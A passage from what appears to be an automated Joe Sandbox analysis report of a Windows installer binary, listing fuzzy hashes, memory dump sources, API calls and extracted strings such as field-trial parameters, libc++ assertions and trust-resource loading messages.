                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c33fb274095a188932260f0ea2736bc6a8e3ca316cc910230737caadc8204e01
                                                                                                                        • Instruction ID: 04726531428ba2b034ef926e04509c6a83461168cd851cc825ab884660223b36
                                                                                                                        • Opcode Fuzzy Hash: c33fb274095a188932260f0ea2736bc6a8e3ca316cc910230737caadc8204e01
                                                                                                                        • Instruction Fuzzy Hash: 3BF19121C1DFDA97D6129B3A8542166F3A0BFFA388F14EB1AFDD475412EB70B2D49240
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
Memory Dump Source
• Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
Yara matches
                                                                                                                        • Opcode Fuzzy Hash: 2f6b083be8cd0dec4ae51d23245692e474ab65840e7064f93ec13dcc141b994f
                                                                                                                        • Instruction Fuzzy Hash: AC81261521822685C32C4F7D8599530F7A9FF58305B14DA3BEC8DCBBE6EB29C884D3A5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 54a9bf14495292a2a205913a51f6b7a979cf36f7bbdc8d03a6b2fd658b64e061
                                                                                                                        • Instruction ID: 171118cf6987b8d9bac661e74c005f4c9b7e80f0f542347fd708a3736e28bead
                                                                                                                        • Opcode Fuzzy Hash: 54a9bf14495292a2a205913a51f6b7a979cf36f7bbdc8d03a6b2fd658b64e061
                                                                                                                        • Instruction Fuzzy Hash: E551B475E011298FDF04CE65C8807AEBBE2FF85341F168169C955EB281D2359D428BD0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7ac47f8c4578cc1fac529b785b8db90ae03f41c9aee6b53b5381fffee8f44611
                                                                                                                        • Instruction ID: 77d9b8b35aa7803847e7ac32abea9dc6c83e71b43ca11e8856264e239f285fbd
                                                                                                                        • Opcode Fuzzy Hash: 7ac47f8c4578cc1fac529b785b8db90ae03f41c9aee6b53b5381fffee8f44611
                                                                                                                        • Instruction Fuzzy Hash: 4B516272E00219EFDF14CF99C840AEEBBF6FF88304F498459E915AB201D774AA55DB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3a6f2e837451545aabe346b11b149648bb061824ca4cb33358dc881b498617d4
                                                                                                                        • Instruction ID: 00999816bb4797dafb1367a2b3322d431ecec21a262aa5ae77bf758a1c777720
                                                                                                                        • Opcode Fuzzy Hash: 3a6f2e837451545aabe346b11b149648bb061824ca4cb33358dc881b498617d4
                                                                                                                        • Instruction Fuzzy Hash: DF518F72D00219EFDF14CF99C840AEEBBB6FF88300F498469E915AB241D7759E40DB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1a0fd7a5873ef41d60fd70c029d79829f517796bc12a9caff67bcfd187504ae0
                                                                                                                        • Instruction ID: 96cacf2e2564bba0ce6df5cd8383eaee05fb53a212009317819212f3b6c7846b
                                                                                                                        • Opcode Fuzzy Hash: 1a0fd7a5873ef41d60fd70c029d79829f517796bc12a9caff67bcfd187504ae0
                                                                                                                        • Instruction Fuzzy Hash: 19510C65D38FCA46E3136B3DA403226E714AEFB598E20E71BFDE438C55FB5192826148
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6febac9748b7a697b4a04af9e9792c2773b60e2a89f072b7284a025d9984854a
                                                                                                                        • Instruction ID: e63f8f0858ea334a1c5db672cdb9fa560d01ba7393863df50f543971367009f0
                                                                                                                        • Opcode Fuzzy Hash: 6febac9748b7a697b4a04af9e9792c2773b60e2a89f072b7284a025d9984854a
                                                                                                                        • Instruction Fuzzy Hash: 9051B171814B059FC703EF38C99196AF7AAFF96744F04C719F44BA6112EB30A895CB52
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 969184d1714d08fbda68cb3d0ed13970b435337c183ddf4ea4504258b8a4104f
                                                                                                                        • Instruction ID: 9ccc1d9717289ed49392b539ee82d2fbf28c6a0851b717701c7fc75283c5d483
                                                                                                                        • Opcode Fuzzy Hash: 969184d1714d08fbda68cb3d0ed13970b435337c183ddf4ea4504258b8a4104f
                                                                                                                        • Instruction Fuzzy Hash: FC4155F5C10F448AD722EF3199016E3F6A2BFA6304F15972EF69A50522F72171D09B42
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                        • Instruction ID: 2adfe65b7998cd0aa3fe5e5a561c7aebc92b100b36c62e4124231faab7179389
                                                                                                                        • Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                        • Instruction Fuzzy Hash: 15514F74E01209DFCB08CF98C590AAEB7B2FF88314F248599D815AB355D731AE91DFA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d84aabd448818e380069a89193d96ee25f13ea4cc77288f3363bc9b1ada2d506
                                                                                                                        • Instruction ID: e13d8649fc046039230024415db6aa793aaad969f1ace12004b88a07562acdb2
                                                                                                                        • Opcode Fuzzy Hash: d84aabd448818e380069a89193d96ee25f13ea4cc77288f3363bc9b1ada2d506
                                                                                                                        • Instruction Fuzzy Hash: 3B41D1DAC2DF8D06E703173DA8831A2B310AEB35A8621EB47FDF4756A1FB12A1557314
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                        • Instruction ID: c7f8b3203a51d136be6706d9fdeff35b05fe9c2a4619f3c9cd1f4b8fab2741b9
                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                        • Instruction Fuzzy Hash: 7111E27F209142439E14CB2DD9B82BAA78BFAC522072D827BD4828B65CD622A15DA704
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • check-the-interface, xrefs: 008BB18A, 008BB1D1, 008BB1D8, 008BB1E9
                                                                                                                        • , installer crashed, xrefs: 008BB5F3
                                                                                                                        • Failed to check Win10 internal interface availability: , xrefs: 008BB003, 008BB39E
                                                                                                                        • Failed to check Win10 internal interface availability, , xrefs: 008BB468
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008BB631
                                                                                                                        • can't get installer exe path., xrefs: 008BB014
                                                                                                                        • IsInternalInterfaceAvailableSafeCheck, xrefs: 008BAFED, 008BB2EC, 008BB385, 008BB452, 008BB4D7, 008BB575
                                                                                                                        • Successfuly checked Win10 internal interface availability: , xrefs: 008BB4EB
                                                                                                                        • availability: , xrefs: 008BB4FD
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008BB62A
                                                                                                                        • installer was terminated by timeout., xrefs: 008BB479
                                                                                                                        • can't run installer: , xrefs: 008BB3AF
                                                                                                                        • Failed to check Win10 internal interface availability, unknown ret code: , xrefs: 008BB302
                                                                                                                        • ret code: , xrefs: 008BB59C
                                                                                                                        • Failed to check Win10 internal interface availability,, xrefs: 008BB58B
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008BB623
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008B65E0: TryAcquireSRWLockExclusive.KERNEL32(00966B40,?,?,00962570,009305AE,?,?,008AEA0C,00962570,?,?,?,?,?,?,-00000001), ref: 008B66D7
                                                                                                                          • Part of subcall function 008B65E0: ReleaseSRWLockExclusive.KERNEL32(00966B40,?,?,00962570,009305AE,?,?,008AEA0C,00962570,?,?,?,?,?,?,-00000001), ref: 008B6700
                                                                                                                        • _strlen.LIBCMT ref: 008AE285
                                                                                                                        • _strlen.LIBCMT ref: 008AE488
                                                                                                                        • _strlen.LIBCMT ref: 008AE4AE
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008AE5AB
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008AE5EB
                                                                                                                          • Part of subcall function 008FFBA7: EnterCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBB2
                                                                                                                          • Part of subcall function 008FFBA7: LeaveCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBEF
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008AE62B
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008AE66B
                                                                                                                        Strings
                                                                                                                        • under feature , xrefs: 008AE472
                                                                                                                        • field_trial_params.cc, xrefs: 008AE40C, 008AE50A
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008AE590
                                                                                                                        • FieldTrialParams-param_name, xrefs: 008AE602
                                                                                                                        • Failed to parse field trial param , xrefs: 008AE41C
                                                                                                                        • FieldTrialParams-feature_name, xrefs: 008AE5C2
                                                                                                                        • with string value , xrefs: 008AE44A
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008AE589
                                                                                                                        • into , xrefs: 008AE49D
                                                                                                                        • Variations.FieldTriamParamsLogInvalidValue, xrefs: 008AE25F
                                                                                                                        • FieldTrialParams-value, xrefs: 008AE642
                                                                                                                        • LogInvalidValue, xrefs: 008AE50F
                                                                                                                        • FieldTrialParams-default, xrefs: 008AE682
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008AE59F
                                                                                                                        • . Falling back to default value of , xrefs: 008AE4C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_header$_strlen$CriticalExclusiveLockSection$AcquireEnterLeaveRelease
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(008446AD,00000000,00000022,008446AD,5750F189), ref: 008C4675
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 008C46CE
                                                                                                                        • GetLastError.KERNEL32(008446AD,5750F189), ref: 008C47BE
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 008C484D
                                                                                                                          • Part of subcall function 008C4C40: FindResourceW.KERNEL32(00000000,?,?,-00000001,008446AD,00000000,?,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C5E
                                                                                                                          • Part of subcall function 008C4C40: SizeofResource.KERNEL32(00000000,00000000,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C6C
                                                                                                                          • Part of subcall function 008C4C40: LoadResource.KERNEL32(00000000,00000000,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C7B
                                                                                                                          • Part of subcall function 008C4C40: LockResource.KERNEL32(00000000,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C86
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000), ref: 008C49C5
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008C4AFB
                                                                                                                        Strings
                                                                                                                        • TRUSTED_JSON, xrefs: 008C48E7, 008C4A10
                                                                                                                        • Attempting to GetTrustJsonFromModule at an invalid path: , xrefs: 008C47F6
                                                                                                                        • Failed to load module for GetTrustJsonFromModule: , xrefs: 008C4888
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008C4C09
                                                                                                                        • SIGNATURE_DAT, xrefs: 008C46B3, 008C4719
                                                                                                                        • Cannot find resource , xrefs: 008C4706, 008C49FD
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008C4C17
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 008C4C26
                                                                                                                        • TRUSTED.JSON, xrefs: 008C48E2
                                                                                                                        • Verify error, xrefs: 008C4B33
                                                                                                                        • Cannot find key, xrefs: 008C4AC1
                                                                                                                        • SIGNATURE.DAT, xrefs: 008C46AE
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008C4C10
                                                                                                                        • GetTrustJsonFromModule, xrefs: 008C46EC, 008C47DE, 008C4870, 008C49E3, 008C4AA9, 008C4B1B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Resource$Load$FindLibraryLockSizeof
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds$Attempting to GetTrustJsonFromModule at an invalid path: $Cannot find key$Cannot find resource $Failed to load module for GetTrustJsonFromModule: $GetTrustJsonFromModule$SIGNATURE.DAT$SIGNATURE_DAT$TRUSTED.JSON$TRUSTED_JSON$Verify error
                                                                                                                        APIs
                                                                                                                        • _strlen.LIBCMT ref: 00848E0E
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000), ref: 00848EB1
                                                                                                                        • _strlen.LIBCMT ref: 00848EC6
                                                                                                                        • _strlen.LIBCMT ref: 00848FBC
